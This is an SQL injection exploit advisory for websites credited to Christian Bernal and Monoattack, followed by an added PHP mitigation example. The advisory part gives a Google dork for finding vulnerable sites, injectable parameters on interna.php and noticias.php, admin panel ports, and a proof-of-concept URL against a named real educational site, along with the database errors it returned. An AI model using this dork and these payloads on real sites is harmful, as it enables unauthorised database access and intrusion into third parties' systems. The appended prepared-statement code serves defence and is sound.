#################################################################################################
# Exploit Title : Design by Christian Bernal Development by Monoattack SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/10/2018
# Vendor Homepage : cbernalstudio.com ~ monoattack.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Design by Christian Bernal - Development by Monoattack'' site:ec
# Admin Panel Path :
TARGET:2083
TARGET:2096
# SQL Injection Exploit :
/interna.php?cupcod=[SQL Injection]
/manta/interna.php?cat=[SQL Injection]
/salinas/noticias.php?1&actual=[SQL Injection]
#################################################################################################
# Example Vulnerable Site => jefferson.edu.ec/interna.php?cupcod=1417%27 => [ Proof of Concept ]
# Example Vulnerable Site Admin Panel Paths => jefferson.edu.ec:2083 ~ jefferson.edu.ec:2096
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near '' AND cupcod IN (SELECT s.cupcod ' at line 3
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ''' at line 3
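#################################################################################################
# Mitigation Example (added here; not part of the original advisory and not the vendor's code) :
# The errors above show the request value reaching the SQL statement unneutralized and the raw database error being returned to the visitor. This PHP example validates cupcod as an integer, binds it through a PDO prepared statement, and keeps database errors out of the response.
# Assumptions: the table `cursos`, the column `titulo` and the function findByCupcod are hypothetical, and an in-memory SQLite database stands in for the MySQL server so the script runs offline.

```php
<?php
// Added example. Only the parameter name `cupcod` comes from the advisory;
// the table `cursos`, column `titulo` and findByCupcod() are hypothetical.
// SQLite in memory stands in for MySQL; the PDO calls are the same with a mysql: DSN.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, // raise exceptions, never echo DB errors
]);
$pdo->exec('CREATE TABLE cursos (cupcod INTEGER PRIMARY KEY, titulo TEXT)');
$pdo->exec("INSERT INTO cursos VALUES (1417, 'Constructed sample row')");

/**
 * Look up one record by the cupcod request parameter.
 * Returns the row, or null when the value is not a positive integer
 * or no row matches.
 */
function findByCupcod(PDO $pdo, string $raw): ?array
{
    // 1. Allow-list the input: the parameter is a numeric id and nothing else.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Bind the value; it never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT cupcod, titulo FROM cursos WHERE cupcod = :cupcod');
    $stmt->bindValue(':cupcod', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a normal id, and the quoted value from the proof of concept.
foreach (['1417', "1417'"] as $input) {
    try {
        $row = findByCupcod($pdo, $input);
        echo $input, ' => ', $row !== null ? $row['titulo'] : 'rejected / not found', PHP_EOL;
    } catch (PDOException $e) {
        // 3. Log the detail server-side; the visitor sees a generic message only.
        error_log($e->getMessage());
        echo 'Request could not be processed.', PHP_EOL;
    }
}
```

# The same pattern applies to the cat and actual parameters listed above.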
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################